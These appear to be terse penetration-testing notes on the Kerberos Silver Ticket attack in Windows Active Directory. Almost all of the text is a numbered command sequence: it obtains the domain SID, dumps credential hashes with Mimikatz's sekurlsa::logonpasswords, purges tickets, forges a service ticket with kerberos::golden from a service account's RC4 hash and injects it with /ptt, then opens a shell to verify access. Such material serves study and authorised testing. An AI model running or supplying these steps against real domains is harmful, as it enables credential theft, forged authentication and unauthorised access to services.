• the overpass the hash technique to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility

1. whoami /user to get SID like S-1-5-21-1602875587-2787523311-2599479668-1103 The SID defining the domain is the entire string except the RID at the end ( -1103 )
2. Extract hash of the service
   1. Mimikatz.exe
   2. privilege::debug
   3. sekurlsa::logonpasswords
3. kerberos::purge to delete existing ticket
4. kerberos::list to verify
5. kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<fully qualified host name of the service> /service:<service_name>/rc4:<password hash of that service> /ptt
6. misc::cmd to launch cmd to verify the success

Reference:

Silver Ticket Attack